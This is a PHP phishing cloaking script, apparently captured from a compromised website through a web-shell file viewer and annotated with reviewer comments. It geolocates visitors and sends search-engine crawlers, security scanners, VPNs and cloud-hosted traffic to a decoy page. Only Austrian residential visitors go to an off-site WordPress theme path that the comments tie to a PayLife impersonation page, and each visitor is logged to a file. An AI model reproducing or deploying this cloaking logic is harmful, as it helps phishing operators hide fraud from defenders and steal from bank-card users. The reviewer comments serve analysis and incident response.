HEX
Server: LiteSpeed
System: Linux venus 5.15.0-157-generic #167-Ubuntu SMP Wed Sep 17 21:35:53 UTC 2025 x86_64
User: axxoncom (1007)
PHP: 8.3.19
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
File: /home/axxoncom/domains/coregroup.pk/public_html/austria/index.php
<?php
// Starts a PHP session. In the visible code, $_SESSION is touched only by the
// rate-limiting section at the end of this file, and that section is never
// reached because both branches of the redirect logic call exit() first.
session_start();

/**
 * Returns the value this script treats as the visitor's IP address.
 *
 * Order of preference: the Client-IP request header, then the first
 * comma-separated entry of X-Forwarded-For, then REMOTE_ADDR. The two header
 * values are supplied by the client (or an intermediary) and are returned
 * without any validation, so the result is not guaranteed to be a well-formed
 * address or the real peer. Only the X-Forwarded-For branch is trimmed.
 *
 * The result feeds the geo-lookup URL, the allow/block list checks and the
 * log line written further down in this file.
 *
 * @return string Header value or REMOTE_ADDR, unvalidated.
 */
function get_ip() {
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) return $_SERVER['HTTP_CLIENT_IP'];
    if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) return trim(explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])[0]);
    return $_SERVER['REMOTE_ADDR'];
}

// Per-request visitor profiling. Every hit on this page makes the web server
// issue one outbound plain-HTTP request to ip-api.com with the visitor address
// in the URL path; that outbound traffic is observable in egress/proxy logs.
// $ip is interpolated into the URL unvalidated (get_ip() may return a raw
// request-header value).
$ip         = get_ip();
// '@' suppresses errors from the lookup. When the request fails or the
// response lacks these keys, both fields below fall back to 'Unknown'.
$details    = @json_decode(file_get_contents("http://ip-api.com/json/{$ip}"), true);
$country    = $details['country'] ?? 'Unknown';
$isp        = $details['isp']     ?? 'Unknown';
// Lower-cased copy used only for matching; the raw header is what gets logged.
// The header is read without an isset() check.
$user_agent = strtolower($_SERVER['HTTP_USER_AGENT']);

// ✅ Allow only Austria
// NOTE(review): this array is not referenced again in the visible code; the
// access logic below compares $country against the literal 'Austria' instead.
$allowed_countries = [
    'Austria'
];

// ✅ Always allowed IPs (whitelist)
// Loopback addresses only. In the access logic this check runs before the
// user-agent and ISP checks, so a match here bypasses both.
$allowed_ips = [
    '127.0.0.1',
    '::1'
];

// ❌ Always blocked IPs (blacklist)
// Both entries fall inside the RFC 5737 documentation ranges (203.0.113.0/24
// and 198.51.100.0/24), so they look like unedited template placeholders
// rather than real targets.
$blocked_ips = [
    '203.0.113.45',
    '198.51.100.23'
];

// ❌ Blocked ISPs (even if Austria)
// Compared by exact string match (in_array) against the 'isp' field returned
// by ip-api.com. A visitor whose network is named here gets reason
// BLOCKED_ISP and is redirected to radio.php instead of the granted
// destination. The list covers cloud/hosting providers, VPN services, data
// centres and internet-scanning companies, i.e. the networks automated URL
// analysis typically originates from, so a scan run from such a network
// observes only the radio.php redirect.
$blocked_isps = [
    // Cloud & Hosting Providers
    'Amazon Technologies Inc.',
    'Amazon.com, Inc.',
    'Microsoft Corporation',
    'Google LLC',
    'DigitalOcean, LLC',
    'Linode, LLC',
    'Vultr Holdings, LLC',
    'OVH SAS',
    'Hetzner Online GmbH',
    'Contabo GmbH',
    'GoDaddy LLC',
    'Namecheap, Inc.',
    
    // VPN & Proxy Services
    'NordVPN',
    'ExpressVPN',
    'CyberGhost',
    'Private Internet Access',
    'Proton Technologies AG',
    'Tor Project',
    'HideMyAss',
    'PureVPN',
    'Windscribe',
    'Surfshark',
    
    // Data Centers & Bot Networks
    'Datacamp',
    'Datacamp Limited',
    'Cogent Communications',
    'IPAX Internet Services',
    'Riepert Informationstechnologie GmbH',
    'Alibaba Cloud',
    'Tencent Cloud',
    'Oracle Cloud',
    'IBM Cloud',
    'Rackspace Hosting',
    
    // Scanning & Security Companies
    'Shodan',
    'Censys',
    'BinaryEdge',
    'ZoomEye',
    'RiskIQ',
    'Project 254',
    
    // Other suspicious providers
    // NOTE(review): these two names look like template placeholders.
    'BadISP Ltd.',
    'Evil Hosting GmbH'
];

// ❌ Blocked User-Agents (bots, crawlers, scanners)
// Lower-case substrings tested with strpos() against the lower-cased
// User-Agent. Any single hit marks the request as a bot. The list spans
// search-engine crawlers, link-preview fetchers, HTTP client libraries,
// headless browsers and security scanners, and several entries ('bot', 'api',
// 'feed', 'scan', 'monitor') are generic enough to match many unrelated
// agents. Requests matched here are redirected to radio.php, so tooling that
// identifies itself with any of these strings sees that redirect and not the
// granted destination.
$blocked_bots = [
    // Search Engine Bots
    'googlebot', 'bingbot', 'yahoo', 'baiduspider', 'yandexbot', 'duckduckbot',
    
    // Social Media Bots
    'facebookexternalhit', 'twitterbot', 'linkedinbot', 'pinterest',
    
    // Analytics & Monitoring
    'ahrefsbot', 'semrushbot', 'moz.com', 'majestic', 'screaming frog',
    
    // Scrapers & Crawlers
    'scrapy', 'beautifulsoup', 'mechanize', 'guzzle', 'requests',
    
    // Programming Languages/Tools
    'python', 'perl', 'java', 'curl', 'wget', 'php', 'golang', 'node.js',
    
    // Generic Bot Indicators
    'bot', 'crawl', 'spider', 'scraper', 'scan', 'monitor', 'checker',
    'analyzer', 'indexer', 'fetcher', 'collector', 'extractor',
    
    // Headless Browsers
    'headless', 'phantomjs', 'selenium', 'puppeteer', 'playwright',
    
    // Security Scanners
    'nmap', 'nessus', 'openvas', 'metasploit', 'burp', 'sqlmap', 'nikto',
    
    // Miscellaneous
    'feed', 'rss', 'aggregator', 'api', 'library', 'framework'
];

// Enhanced Bot Detection
// Pass 1: substring match of every $blocked_bots entry against the
// lower-cased User-Agent; stops at the first hit.
$blocked = false;
foreach ($blocked_bots as $bot) {
    if (strpos($user_agent, $bot) !== false) {
        $blocked = true;
        break;
    }
}

// Additional Bot Detection Patterns
// Pass 2: regular expressions over the same string. This loop runs even when
// pass 1 already set $blocked; it can only set the flag, never clear it.
$suspicious_patterns = [
    // No user agent
    '/^$/',
    
    // Very short user agents
    // (0-10 characters, so this also covers the empty case above)
    '/^.{0,10}$/',
    
    // Common bot patterns
    '/bot[^a-z]/i',
    '/crawler/i',
    '/spider/i',
    '/scraper/i',
    
    // Programming language user agents
    '/python|perl|java|ruby|golang|node/i',
    
    // HTTP libraries
    // (the '.' in 'http.client' is unescaped and matches any character)
    '/libwww|http.client|okhttp|axios/i'
];

foreach ($suspicious_patterns as $pattern) {
    if (preg_match($pattern, $user_agent)) {
        $blocked = true;
        break;
    }
}

// Access Logic
// First matching rule wins, in this order:
//   1. address in $blocked_ips        -> denied  (BLOCKED_IP)
//   2. address in $allowed_ips        -> granted (WHITELISTED_IP), skipping
//                                        the user-agent, ISP and country checks
//   3. user-agent flagged as bot      -> denied  (BOT_DETECTED)
//   4. ISP name in $blocked_isps      -> denied  (BLOCKED_ISP)
//   5. country is exactly 'Austria'   -> granted (AUSTRIA_ALLOWED)
//   6. anything else                  -> denied  (COUNTRY_BLOCKED)
// A failed geo-lookup leaves $country as 'Unknown' and therefore ends in
// rule 6. The in_array() calls use PHP's default loose comparison.
if (in_array($ip, $blocked_ips)) {
    $access_granted = false;
    $reason = "BLOCKED_IP";
} elseif (in_array($ip, $allowed_ips)) {
    $access_granted = true;
    $reason = "WHITELISTED_IP";
} elseif ($blocked) {
    $access_granted = false;
    $reason = "BOT_DETECTED";
} elseif (in_array($isp, $blocked_isps)) {
    $access_granted = false;
    $reason = "BLOCKED_ISP";
} elseif ($country === 'Austria') {
    $access_granted = true;
    $reason = "AUSTRIA_ALLOWED";
} else {
    $access_granted = false;
    $reason = "COUNTRY_BLOCKED";
}

// Enhanced Logging
// Appends one pipe-separated line per request to 'visitor.txt', resolved
// relative to the script's working directory (presumably the same web
// directory as this file; confirm on the host). Fields: address, country,
// ISP, local timestamp, GRANTED/BLOCKED, reason code, raw User-Agent.
// For incident response this file is a record of who reached the gate and
// which visitors were forwarded to the granted destination.
// The address and User-Agent are written unescaped, so a line can contain
// arbitrary client-supplied text, including extra '|' separators or newlines;
// treat the file as untrusted input when parsing it.
$log = sprintf(
    "%s | %s | %s | %s | %s | %s | UA: %s\n",
    $ip,
    $country,
    $isp,
    date("Y-m-d H:i:s"),
    $access_granted ? 'GRANTED' : 'BLOCKED',
    $reason,
    $_SERVER['HTTP_USER_AGENT']
);
file_put_contents('visitor.txt', $log, FILE_APPEND | LOCK_EX);

// Additional Security Headers
// Sent on every response from this script. Each path below ends in a
// Location redirect followed by exit(), so no page body is produced here for
// these headers to apply to.
header("X-Frame-Options: DENY");
header("X-Content-Type-Options: nosniff");
header("Referrer-Policy: strict-origin-when-cross-origin");

// Redirect logic
// Granted visitors are sent off-site; everyone else is sent to the local
// radio.php. Both branches call exit(), so nothing after this if/else runs.
if ($access_granted) {
    // Redirect to paylife.com when access is granted
    // NOTE(review): the comment above names paylife.com, but the Location
    // target is a path under a WordPress theme directory on alarafi.net, and
    // the last path segment resembles the name "PayLife". That mismatch is
    // consistent with a brand-impersonation page hosted on a third-party
    // site; confirm from the destination content.
    header("Location: https://alarafi.net/wp-content/themes/twentytwenty/inc/jam31/visitor/P_YLlFE/");
    exit();
} else {
    // Optional: Add delay to slow down bots
    // Only the BOT_DETECTED reason is delayed; other denials redirect at once.
    if ($reason === "BOT_DETECTED") {
        sleep(2);
    }
    
    // Relative redirect to radio.php, the page shown to every filtered-out
    // visitor. Its content is not visible in this file.
    header("Location: radio.php");
    exit();
}

// Optional: Rate limiting for additional security
// NOTE(review): unreachable as written. Both branches of the redirect logic
// above end in exit(), so this section never executes and no request is ever
// rate limited or logged as RATE_LIMITED by this file.
// As coded, it would keep a per-session counter keyed by the MD5 of the
// visitor address and, past 10 requests within 60 seconds of the first one,
// append a RATE_LIMITED line to visitor.txt and redirect to deny.php.
$rate_limit_key = 'rate_limit_' . md5($ip);
if (!isset($_SESSION[$rate_limit_key])) {
    $_SESSION[$rate_limit_key] = [
        'count' => 1,
        'first_access' => time()
    ];
} else {
    $_SESSION[$rate_limit_key]['count']++;
    
    // Block if more than 10 requests per minute
    // (the window start, 'first_access', is never reset in this code)
    if ($_SESSION[$rate_limit_key]['count'] > 10 && 
        (time() - $_SESSION[$rate_limit_key]['first_access']) < 60) {
        $log = sprintf(
            "%s | %s | %s | %s | RATE_LIMITED | Too many requests\n",
            $ip,
            $country,
            $isp,
            date("Y-m-d H:i:s")
        );
        file_put_contents('visitor.txt', $log, FILE_APPEND | LOCK_EX);
        
        header("HTTP/1.1 429 Too Many Requests");
        header("Location: deny.php");
        exit();
    }
}
?>